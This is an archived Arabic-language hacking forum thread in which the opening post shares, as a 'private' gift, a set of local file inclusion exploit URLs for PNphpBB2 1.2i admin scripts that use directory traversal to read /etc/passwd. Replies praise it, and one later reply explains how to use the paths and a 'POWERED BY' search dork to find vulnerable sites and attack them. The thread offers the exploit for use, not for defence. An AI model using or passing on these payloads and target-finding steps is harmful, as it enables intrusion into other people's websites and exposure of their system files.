:: vBspiders Professional Network ::

:: vBspiders Professional Network :: (http://www.vbspiders.com/vb/index.php)
-   برمجة الويب (http://www.vbspiders.com/vb/f424.html)
-   -   لعيونكم ثغره برايفت وخاصه PHP (http://www.vbspiders.com/vb/t21720.html)

NEVER HaCKEr 10-30-2009 01:29 PM
لعيونكم ثغره برايفت وخاصه PHP
 
بسم الله الرحمن الرحيم

كيفكم اخواني عساكم بخير يارب ما ابي اطول عليكم بس بصراحه ماني شايف قسم لثغرات المواقع وممكن ما انتبهت قاعد ادور من الصبح ماني ملاقيها المهم بسدحلكم الثغره ودعس موفق ياحلوين

تشاااااااااااااو



كود:
+=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=+=--=--=--=--=--=-+
| PNphpBB2 <= 1.2i (ModName) Multiple LFI Vulnerabilities | Note |
+=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=+=--=--=--=--=--=-+
| discovered by athos - staker[at]hotmail[dot]it | register glob 1 |
| download on http://www.pnphpbb.com/ | enjoy your aids |
+=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=+--=--=--=--=--=-=+
| Local File Inclusion |
| 1. admin/admin_words.php?ModName=../../../../../etc/passwd |
| 2. admin/admin_groups_reapir.php?ModName=../../../../../etc/passwd |
| 3. admin/admin_smilies.php?ModName=../../../../../etc/passwd |
| 4. admin/admin_ranks.php?ModName=../../../../../etc/passwd |
| 5. admin/admin_styles.php?ModName=../../../../../etc/passwd |
| 6. admin/admin_users.php?ModName=../../../../../etc/passwd |
+=--=--=--=--=--+--=--=--=--=--=--=--=--=--=--=--=--=--=--=--+-=--=--=--=--=--=-+

دعس موفق ياشباب تقبلو مروري

ma Ado hade 10-30-2009 04:00 PM
مشكور بس ياليت توضح الاني ما فهمت كيف استغلها

KaLa$nikoV 10-30-2009 07:17 PM
هاي هيك القوه يا عم والله مبدع

بالنسبه للي يطلب التوضيح
هاي ثغره اسمها لوكال فايل انكلود
اتعلمها رح تفهمها
السكربت المصاب عنا بالثغره
PNphpBB2
طريقه الاستغلال بسيطه جدا

NEVER HaCKEr 10-30-2009 07:32 PM
مشكووور اخي VoLc4n0 على التوضيح واتمنى الكل يستفيد




:00001793[1]:

اسد سوريا 10-30-2009 08:20 PM
مشكور اخي

dahapp 09-21-2011 02:27 PM
رد: لعيونكم ثغره برايفت وخاصه PHP
 
مشكوررر

sasouki_xXx 09-24-2011 06:22 PM
رد: لعيونكم ثغره برايفت وخاصه PHP
 
merciiiiiiiiiiiiiii

Dr.MwNs 09-26-2011 07:40 AM
رد: لعيونكم ثغره برايفت وخاصه PHP
 
اقتباس:
المشاركة الأصلية كتبت بواسطة ma Ado hade (المشاركة 75693)
مشكور بس ياليت توضح الاني ما فهمت كيف استغلها
1. admin/admin_words.php?ModName=
| 2. admin/admin_groups_reapir.php?ModName=
| 3. admin/admin_smilies.php?ModName= <~ دوركات البحث
| 4. admin/admin_ranks.php?ModName=
| 5. admin/admin_styles.php?ModName=
| 6. admin/admin_users.php?ModName=

او "DoORK= "POWERED BY PNphpBB2 1.2I

الاستغلال بعد علآمة = تضع ../../../../../etc/passwd

Dr.MwNs 09-26-2011 07:42 AM
رد: لعيونكم ثغره برايفت وخاصه PHP
 
يآ سلآم عليك اخوي ^^

ابدااااااع والله

مع إني ماشفت الثغرة
لكن شي حلو ان الواحد فينا
يكتشف الثغرات بنفسه ^^

تقبل مروري

Mr.MeRo 09-27-2011 10:13 AM
رد: لعيونكم ثغره برايفت وخاصه PHP
 
ثانكس يا كبير


الساعة الآن 10:45 PM


[ vBspiders.Com Network ]


SEO by vBSEO 3.6.0